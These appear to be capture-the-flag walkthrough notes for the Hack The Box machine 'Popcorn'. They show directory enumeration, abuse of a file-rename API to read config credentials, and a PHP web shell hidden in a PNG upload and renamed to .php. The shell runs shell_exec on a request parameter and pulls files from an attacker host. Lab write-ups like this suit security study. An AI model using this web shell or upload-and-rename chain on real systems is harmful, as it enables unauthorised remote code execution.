2 :80

http://10.10.10.6/
It works landing page

$ gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html           (Status: 200) [Size: 177]
/index                (Status: 200) [Size: 177]
/test.php             (Status: 200) [Size: 47044]
/test                 (Status: 200) [Size: 47032]
/torrent              (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename               (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]

http://10.10.10.6/test | http://10.10.10.6/test.php
PHP Version 5.2.10-2ubuntu6.10
System 	Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 
Configuration File Path 	/etc/php5/apache2 
Hostname:Port 	popcorn.hackthebox.gr:80 
DOCUMENT_ROOT	/var/www
SCRIPT_FILENAME 	/var/www/test.php 

http://10.10.10.6/rename/ | http://10.10.10.6/rename/index.php
Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
# works; can rename file
# tested using >
GET /rename/index.php?filename=/var/www/test.php&newfilename=/var/www/kashz.php HTTP/1.1

http://10.10.10.6/kashz.php
# shows phpinfo

http://10.10.10.6/torrent/
Torrent Hoster

$ gobuster dir -u http://10.10.10.6/torrent/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.php            (Status: 200) [Size: 11356]
/images               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/images/]
/upload               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/upload/]
/download             (Status: 200) [Size: 0]
/rss                  (Status: 200) [Size: 964]
/login.php            (Status: 200) [Size: 8371]
/templates            (Status: 301) [Size: 320] [--> http://10.10.10.6/torrent/templates/]
/users                (Status: 301) [Size: 316] [--> http://10.10.10.6/torrent/users/]
/admin                (Status: 301) [Size: 316] [--> http://10.10.10.6/torrent/admin/]
/health               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/health/]
/browse.php           (Status: 200) [Size: 9278]
/comment.php          (Status: 200) [Size: 936]
/css                  (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/css/]
/edit.php             (Status: 200) [Size: 0]
/lib                  (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/lib/]
/database             (Status: 301) [Size: 319] [--> http://10.10.10.6/torrent/database/]
/secure.php           (Status: 200) [Size: 4]
/js                   (Status: 301) [Size: 313] [--> http://10.10.10.6/torrent/js/]
/logout               (Status: 200) [Size: 182]
/logout.php           (Status: 200) [Size: 182]
/preview              (Status: 200) [Size: 28104]
/config.php           (Status: 200) [Size: 0]
/readme               (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/readme/]
/thumbnail.php        (Status: 200) [Size: 1789]
/torrents.php         (Status: 200) [Size: 6477]
/torrents             (Status: 301) [Size: 319] [--> http://10.10.10.6/torrent/torrents/]
/validator.php        (Status: 200) [Size: 0]
/hide                 (Status: 200) [Size: 3765]
/PNG                  (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/PNG/]

http://popcorn.htb/torrent/readme/readme.html
Torrent Hoster 2.0
- /database/th_database.sql
- config.php
- go to the url where you uploaded the script and you are good to go. Admin username: admin; password : admin12
# creds don't work on login page

http://10.10.10.6/torrent/database/th_database.sql
[trunacted]
-- 
-- Table structure for table `users`
-- 

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `userName` varchar(40) NOT NULL default '',
  `password` varchar(40) NOT NULL default '',
  `privilege` varchar(10) NOT NULL default '',
  `email` varchar(30) NOT NULL default '',
  `joined` datetime NOT NULL default '0000-00-00 00:00:00',
  `lastconnect` datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY  (`id`),
  UNIQUE KEY `userName` (`userName`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ;

-- 
-- Dumping data for table `users`
-- 
INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', 'admin@yourdomain.com', '2007-01-06 21:12:46', '2007-01-06 21:12:46');

http://10.10.10.6/torrent/config.php
# cant read it
# trying to rename to config.txt and read it
GET /rename/index.php?filename=/var/www/torrent/config.php&newfilename=/var/www/torrent/config.txt HTTP/1.1
# works
HTTP/1.1 200 OK
OK!

http://10.10.10.6/torrent/config.txt
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster";	//db name
$CFG->dbUserName = "torrent";    //db username
$CFG->dbPassword = "SuperSecret!!";	//db password
# reset the file  to not break the system

# doing the same with /torrent/login.php to confirm if its using config.php or hardcoded values
GET /rename/index.php?filename=/var/www/torrent/login.php&newfilename=/var/www/torrent/login.txt HTTP/1.1

HTTP/1.1 200 OK
OK!

http://10.10.10.6/torrent/login.txt
include("config.php");

# cant login; not sure

http://10.10.10.6/torrent/users/index.php?mode=register
# registering a new user kashz:kashz
loggin in > http://10.10.10.6/torrent/index.php

# there is upload section to upload .torrent

Using http://sample-file.bazadanni.com/2012/01/torrent.html
# got a sample torrent and uploaded.
# can edit thumbnail for torrent
# image is uploaded at http://10.10.10.6/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.png

# time toi modify
$ cat kashz.png
<?php
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents('http://10.10.16.5/' . $_REQUEST['fupload']));
    };
?>
# successful upload
# can use rename to modify to php

# writing new file to /var/www/torrents/
GET /rename/index.php?filename=/var/www/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.png&newfilename=/var/www/torrent/kashz.php HTTP/1.1

HTTP/1.1 200 OK
OK!

http://10.10.10.6/torrent/kashz.php?cmd=whoami;id;hostname;uname%20-a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
popcorn
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

# can get web shell using
http://10.10.10.6/torrent/kashz.php?fupload=web.php

Last updated